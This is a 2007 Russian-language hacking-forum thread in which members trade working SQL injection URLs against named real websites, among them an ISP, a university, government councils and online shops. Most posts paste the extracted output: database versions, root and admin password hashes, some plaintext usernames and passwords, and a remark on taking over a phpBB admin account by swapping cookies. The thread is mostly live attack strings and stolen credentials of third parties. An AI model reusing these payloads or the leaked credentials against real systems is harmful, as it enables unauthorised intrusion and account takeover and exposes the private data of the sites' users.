ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.10.2007, 12:30
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Интернет-провайдер в Тушино
http://tushino.com/?r=9999&id=-1'/**/union/**/select/**/0,1,2,3,4,5,6,user,8,9,password,11,12,13,14,15/**/from/**/mysql.user/*
root;396c55134cded03d
4.0.20-log |
|
|
21.10.2007, 14:03
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
fobo.ru
http://fobo.ru/member.php?action=getinfo&id=-1'+union+select+1,2,concat(version(),0x2F,database (),0x2F,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 ,51,52/*
5.0.45-Dotdeb_0.dotdeb.0-log/fobo/fobo@localhost
http://fobo.ru/member.php?action=getinfo&id=-1'+union+select+1,2,concat(username,0x2F,password, 0x2F,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52+from+user+limit+10000,1/*
имя\хеш\мейл 71530 участников )))
|
|
|
|
21.10.2007, 14:33
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от [53x]Shadow
MySQL 3.x.x.
Код:
http://www.auburn.edu/oit/oitnews/article.php?num=57+/!*40000+and+0+*/
тогда уж так:
Код:
http://www.auburn.edu/oit/oitnews/article.php?num=57/*!40000+a'nd+0+*/
__________________
Карфаген должен быть разрушен...
|
|
|
|
21.10.2007, 16:27
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.vive.gob.ve/programas.php?id_p=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71)/*
4.1.11-Debian_4sarge7-log
Код:
http://www.fitologica.it/indicazioni.php?id_p=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database()),9,10,11,12,13,14,15,16/*
fitologica_it@localhost:4.1.21:fitologica_it
Код:
http://www.undergroundkiteboards.com/detail_product.php?id_p=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6/*
undergro@202.191.42.50:4.0.27-standard-log:undergro
Код:
http://www.undergroundkiteboards.com/detail_product.php?id_p=-1+union+select+1,2,concat(login,0x3a,pwd),4,5,6+from+user+limit+0,1/*
dd:d adrian:bernie12 aaron:as7155as
Код:
http://www.brightstar-hid.com/product_info_e.php?UID=-1'+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
brightstar@localhost:5.0.22:brightstar_com_tw
Код:
http://voyag-lux.ru/chapter28.html?uid=-1+union+select+1,aes_decrypt(aes_encrypt(user,0x71),0x71),3,aes_decrypt(aes_encrypt(password,0x71),0x71),5,6,7+from+mysql.user/*
|
|
|
|
21.10.2007, 16:52
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
kazan.ws
http://kazan.ws/cgi-bin/republic/viewDG.pl?a=fa&id=-1+union+select+1,2,concat(version(),0x2F,database( ),0x2F,user()),4,5,6,7,8,9,10,11/*
4.0.26/kazan/postcards@192.168.1.15
http://kazan.ws/cgi-bin/republic/viewDG.pl?a=fa&id=-1+union+select+1,2,concat(name,0x2F,password),4,5, 6,7,8,9,10,11+from+users+limit+1,1/*
имя/пароль
123/123
|
|
|
|
21.10.2007, 18:00
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
website-security-software
Код:
https://www.website-security-software.com/portfolio-view.asp?cmd=view&ref=1%20and%201=convert(int,db_name())--
|
|
|
|
21.10.2007, 21:52
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
showcase.ru
http://www.showcase.ru/photo.php?photoid=-1+union+select+concat(version(),0x2F,database(),0x 2F,user()),2/*
5.0.45-log/u17392/u17392@10.10.10.208
http://www.showcase.ru/photo.php?photoid=-1+union+select+concat(admin,0x2F,admin_pw,0x2F,adm in_email)),2+from+phpads_config/*
admin/070d140eab0b74231c3a7fdaef1dea1b/troff@showcase.ru
Таблица phpbb_users
http://www.showcase.ru/photo.php?photoid=-1+union+select+concat(0x5B,username,0x2F,user_pass word,0x2F,user_icq,0x5D),2+from+phpbb_users/*
имя/хеш/уин
Таблица sziget_phpbb_users
http://www.showcase.ru/photo.php?photoid=-1+union+select+concat(0x5B,username,0x2F,user_pass word,0x2F,user_icq,0x5D),2+from+sziget_phpbb_users/*
имя/хеш/уин
Бывает, что если сразу грузить ссылку со скулей получеам чистый экран с надписью Oops!!! . Если же выполнять скулю поэтапно с ссылки-первоисточника то все работает
|
|
|
|
22.10.2007, 00:34
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Две интересные инъекции:
Код:
http://www.posarellivillas.com/it/testimonials.php?start_limit=0&length_limit=5&sort_type=DESC&sort_value=(select+if(ascii(substring(version(),1,1))=53,propertyid,city))
Код:
http://imoti.bulgaria-web-developers.com/property-for-sale.php?order=-id*(ascii(substring(version(),1,1))=53)+DESC&page_number=30&type=&location=
как видно везде 5-я версия мускула
кто первый скажет в чем прикол, поставлю ++
(репа должна быть меньше 100)
ответы мне в личку
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 22.10.2007 в 00:37..
|
|
|
|
22.10.2007, 11:34
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
МУЗЫКА
код:
http://www.intenserecords.co.uk/news.php?id=-780+union+select+1,2,3,concat(id,0x3a,name,0x3a,pa ssword,0x3a,email),5+from+users+limit+1258,1/*
|
|
|
|
22.10.2007, 11:55
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Городской совет Новосибирска
http://www.gorsovet.novo-sibirsk.ru/?current=127&nid=-1006+union+select+AES_DECRYPT(AES_ENCRYPT(user,0x7 1),0x71),AES_DECRYPT(AES _ENCRYPT(password,0x71),0x71),3,4,5+from+mysql.use r/*
User: root@localhost
Version: 4.1.9
Username: root
Hash: EC91857AA1C8BFF0FCAE9AD2D5E8B6D89CFB3316
Power of metal
Вообще-то сайт - один сплошной phpBB форум, который админы не патчили давненько, бага в нем еще 2004 года...
http://powerofmetal.dff.ru/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_passwo rd%20FROM%20phpbb_users%20LIMIT%201,999/*
User: helloween@localhost
Version: 4.0.24_Debian-10sarge1-log
Для работы скули нуно зарегится на форуме
PhpBB admin name: Alex
PhpBB admin hash: 687f270ddf67dd0bb8185edfef3fe4e1
Через подмену куков становимся админами
Последний раз редактировалось 0nep@t0p; 22.10.2007 в 13:16..
|
|
|
|
|
|
|
|
Здесь присутствуют: 13 (пользователей: 0 , гостей: 13)
|
|
|
|
Похожие темы
Линейный вид
